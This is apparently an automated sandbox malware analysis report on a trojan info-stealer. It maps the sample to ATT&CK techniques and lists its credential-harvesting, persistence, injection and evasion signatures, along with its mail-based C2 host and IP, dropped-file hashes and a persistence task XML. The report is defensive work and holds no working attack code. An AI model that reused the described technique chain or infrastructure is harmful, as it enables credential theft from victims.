                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        Scheduled Task/Job
                        111
                        Process Injection
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        111
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        11
                        Disable or Modify Tools
                        1
                        Credentials in Registry
                        1
                        Process Discovery
                        Remote Desktop Protocol11
                        Archive Collected Data
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        141
                        Virtualization/Sandbox Evasion
                        Security Account Manager141
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares2
                        Data from Local System
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture11
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        File and Directory Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                        Obfuscated Files or Information
                        Cached Domain Credentials24
                        System Information Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482478 Sample: LisectAVT_2403002A_16.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 48 mail.mbarieservicesltd.com 2->48 50 171.39.242.20.in-addr.arpa 2->50 54 Found malware configuration 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Sigma detected: Scheduled temp file as task from temp location 2->58 60 7 other signatures 2->60 8 LisectAVT_2403002A_16.exe 7 2->8         started        12 NxmtwwVGOtEdjd.exe 5 2->12         started        signatures3 process4 file5 40 C:\Users\user\AppData\...40xmtwwVGOtEdjd.exe, PE32 8->40 dropped 42 C:\...42xmtwwVGOtEdjd.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmpB5CB.tmp, XML 8->44 dropped 46 C:\Users\...\LisectAVT_2403002A_16.exe.log, ASCII 8->46 dropped 62 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->62 64 Uses schtasks.exe or at.exe to add and modify task schedules 8->64 66 Adds a directory exclusion to Windows Defender 8->66 14 LisectAVT_2403002A_16.exe 2 8->14         started        18 powershell.exe 22 8->18         started        20 powershell.exe 23 8->20         started        28 2 other processes 8->28 68 Antivirus detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 22 NxmtwwVGOtEdjd.exe 12->22         started        24 schtasks.exe 12->24         started        26 NxmtwwVGOtEdjd.exe 12->26         started        signatures6 process7 dnsIp8 52 mail.mbarieservicesltd.com 199.79.62.115, 49735, 49736, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->52 74 Loading BitLocker PowerShell Module 18->74 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->76 78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal ftp login credentials 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 36 conhost.exe 24->36         started        38 conhost.exe 28->38         started        signatures9 process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        LisectAVT_2403002A_16.exe100%AviraTR/Kryptik.mzsma
                        LisectAVT_2403002A_16.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe100%AviraTR/Kryptik.mzsma
                        C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                        http://www.fontbureau.com0%URL Reputationsafe
                        http://www.fontbureau.com/designersG0%URL Reputationsafe
                        http://www.fontbureau.com/designers/?0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        http://www.fontbureau.com/designers?0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.fontbureau.com/designers0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.fontbureau.com/designers80%URL Reputationsafe
                        http://www.fonts.com0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://mail.mbarieservicesltd.com0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        199.79.62.115
                        truetrue
                          unknown
                          171.39.242.20.in-addr.arpa
                          unknown
                          unknownfalse
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersGLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/?LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/bTheLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.tiro.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.goodfont.co.krLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comlLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sajatypeworks.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.typography.netDLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/cTheLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cnLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-user.htmlLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers8LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sandoll.co.krLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.urwpp.deDPleaseLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.zhongyicts.com.cnLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000A.00000002.1786665418.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sakkal.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726399605.0000000005990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://mail.mbarieservicesltd.comLisectAVT_2403002A_16.exe, 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            199.79.62.115
                            mail.mbarieservicesltd.comUnited States
                            394695PUBLIC-DOMAIN-REGISTRYUStrue
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1482478
                            Start date and time:2024-07-25 23:34:26 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 51s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:LisectAVT_2403002A_16.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/15@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: LisectAVT_2403002A_16.exe
                            TimeTypeDescription
                            17:35:16API Interceptor22x Sleep call for process: LisectAVT_2403002A_16.exe modified
                            17:35:19API Interceptor55x Sleep call for process: powershell.exe modified
                            17:35:24API Interceptor17x Sleep call for process: NxmtwwVGOtEdjd.exe modified
                            22:35:20Task SchedulerRun new task: NxmtwwVGOtEdjd path: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2232
                            Entropy (8bit):5.379552885213346
                            Encrypted:false
                            SSDEEP:48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMRvUyus:fLHxvCZfIfSKRHmOugras
                            MD5:536673CFEEBA235304073B32A6519556
                            SHA1:31B610549B437B8290C8B20809704C1118CCC457
                            SHA-256:E7BBD1CC511FA56E4A5ABD9403A0A40A9B789CA77B12418A28BFC34FB96E46BC
                            SHA-512:100211350FFCD4CC63BAA55B75FAAFAEA3524F2E58142883E3C40E63990264D57F4D13536ADC06D2342270CE48C9000D9EA1E81BB045FB9A1EBADEEB1D963D13
                            Malicious:false
                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1580
                            Entropy (8bit):5.116484496204205
                            Encrypted:false
                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTcv
                            MD5:1AC293B57893D7F15FEC2D62F2B81B15
                            SHA1:7D73A01CDEBDC72F08EF5001BE928CADFAE17FF7
                            SHA-256:7F4C202C63938CB22EED8ABDC026F2AE89379086669AFCE07C713A74331736C8
                            SHA-512:92BF0B98B56A2C92C493F33CD6478901E25E78411AE816D941467F30139941ABD96DFA3D7787580BD445ACEC7679F4DF09341F8DB3ED183A7FA9AF3FBF9F5B2E
                            Malicious:true
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
